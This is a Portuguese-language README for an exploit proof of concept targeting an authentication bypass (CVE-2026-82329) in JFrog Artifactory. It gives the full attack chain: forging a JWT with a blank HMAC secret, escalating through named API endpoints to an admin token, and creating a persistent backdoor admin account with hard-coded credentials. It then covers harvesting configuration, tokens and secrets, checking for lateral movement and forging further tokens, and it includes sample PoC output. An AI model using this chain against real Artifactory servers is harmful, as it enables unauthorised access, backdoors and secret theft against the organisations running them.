
Exploit PoC para CVE-2026-82329, uma bypass de autenticação no JFrog Artifactory. Demonstra a forja de tokens JWT para obter acesso de administrador e criar um usuário backdoor persistente.
CVE-2026-82329 — Bypass de Autenticação no JFrog Artifactory
A Vulnerabilidade
Bypass de autenticação crítico no JFrog Artifactory (versões 7.111.20, 7.117.27, 7.125.19, 7.133.28, 7.146.37, 7.161.19). A falha permite que um atacante não autenticado forje um JWT usando um segredo HMAC em branco (32 bytes de 0x20), gere um token de administrador e crie um usuário backdoor.
Cadeia de Exploração
Etapa Ação 1 Forjar JWT com alg=HS256, kid=SHA256(""), skip_node_registration=true 2 Enviar JWT para /access/api/v1/registry/join → obter token SERVICE 3 Trocar token SERVICE por token ADMIN via /access/api/v1/tokens 4 Verificar acesso de administrador via /artifactory/api/system/configuration, /access/api/v1/tokens, /artifactory/api/system/version 5 Criar usuário administrador persistente via /artifactory/api/security/users/{user} 6 Coletar config, tokens, usuários, repositórios, segredos 7 Forjar tokens para assuntos de alto valor
Fluxo do Ataque
BLANK_SECRET = b"\x20" * 32
↓
Forjar JWT (HS256, kid=hashlib.sha256(""))
↓
POST /access/api/v1/registry/join
↓
Token SERVICE (scp=admin)
↓
POST /access/api/v1/tokens
↓
Token ADMIN (scp=applied-permissions/admin, aud=*)
↓
Provar Admin (GET /artifactory/api/system/configuration → 200)
↓
PUT /artifactory/api/security/users/0xTerror
↓
Usuário Administrador Persistente: 0xTerror:Terrorp0c!7777
↓
Coleta: Config, Tokens, Usuários, Repositórios, Segredos
↓
Verificação de Movimentação Lateral: Xray, Mission Control, Distribution, etc.
↓
Forjar Tokens para Assuntos de Alto Valor
Exemplo de Saída do PoC
[+] Etapa 1 /registry/join -> HTTP 201 token SERVICE (scp=admin)
[+] Etapa 2 /access/api/v1/tokens -> HTTP 200 token ADMIN (scp=applied-permissions/admin)
[+] Etapa 3 prova de admin: config=200, tokens=200, version=200
[+] Etapa 4 criar usuário admin '0xTerror' -> HTTP 201
[=] VULNERÁVEL — atacante não autenticado obteve ADMIN
Usuário admin: 0xTerror:Terrorp0c!7777